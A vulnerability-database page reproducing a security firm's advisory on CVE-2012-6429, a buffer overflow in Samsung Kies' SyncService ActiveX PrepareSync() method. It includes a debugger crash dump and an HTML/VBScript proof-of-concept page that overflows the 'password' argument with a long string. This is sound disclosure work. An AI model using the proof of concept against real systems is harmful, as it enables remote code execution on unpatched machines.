Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23136
HistoryDec 19, 2012 - 12:00 a.m.

Remote Buffer Overflow Vulnerability in Samsung Kies

2012-12-1900:00:00
High-Tech Bridge
www.htbridge.com
22

EPSS

0.455

Percentile

97.4%

JSON

High-Tech Bridge Security Research Lab has discovered buffer overflow vulnerability in Samsung Kies, which can be exploited to execute arbitrary code on vulnerable system.

  1. Buffer overflow in Samsung Kies: CVE-2012-6429
    The vulnerability exists due to insufficient sanitisation of input data in the PrepareSync() method within the ActiveX controlSyncService.dll, GUID**{ EA8A3985-F9DF-4652-A255-E4E7772AFCA8 }, located by default in “C:\Program Files\Samsung\Kies\External\DeviceModules\SyncService.dll”.
    A remote attacker can pass an arbitrary value to the “password” argument of the    PrepareSync()** method and trigger an ACCESS_VIOLATION exception, which could be exploited to successfully overwrite the EIP register and the SEH structure.
    Taking into consideration the Unicode Format nature of this vulnerability,
    an attacker should rely on a predictable Unicode module loaded at crash time
    in order to efficiently exploit the vulnerability.

Crash details:
(9b4.720): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00410041 edx=771b71ad esi=00000000 edi=00000000 eip=00410041 esp=001fe2d0 ebp=001fe2f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00410041 ?? ???

The following PoC (Proof-of-concept) code demonstrates buffer overflow vulnerability:
<html>
<!-- ©oded by High-Tech Bridge Security Research Lab –>
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v. 2.5.0.12114_1 </title>
</head>
<script language=‘vbscript’>
Sub PoC()
arg1=“defaultV”
arg2=String(14356, “A”)
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value=“Proof of Concept”>
</body>
<object classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8’id=‘Target’></object>
< /html>

Related

cve 1
exploitdb 1
zdt 1
cvelist 1
packetstorm 1
nessus 1
securityvulns 2
prion 1
nvd 1
cve
cve
CVE-2012-6429
2014-04-04 14:55:07
exploitdb
exploitdb
Samsung Kies - Remote Buffer Overflow
2013-01-09 00:00:00
zdt
zdt
Samsung Kies 2.5.0.12114_1 Buffer Overflow Vulnerability
2013-01-10 00:00:00
cvelist
cvelist
CVE-2012-6429
2014-04-04 14:00:00
packetstorm
packetstorm
Samsung Kies 2.5.0.12114_1 Buffer Overflow
2013-01-10 00:00:00
nessus
nessus
Samsung Kies SyncService ActiveX PrepareSync() Buffer Overflow
2013-01-24 00:00:00
securityvulns
securityvulns
Remote Buffer Overflow Vulnerability in Samsung Kies
2013-01-10 00:00:00
Samsung Kies ActiveX multiple security vulnerabilities
2013-01-10 00:00:00
prion
prion
Buffer overflow
2014-04-04 14:55:00
nvd
nvd
CVE-2012-6429
2014-04-04 14:55:07

EPSS

0.455

Percentile

97.4%

JSON
Related for HTB23136
cve1exploitdb1zdt1cvelist1packetstorm1nessus1securityvulns2prion1nvd1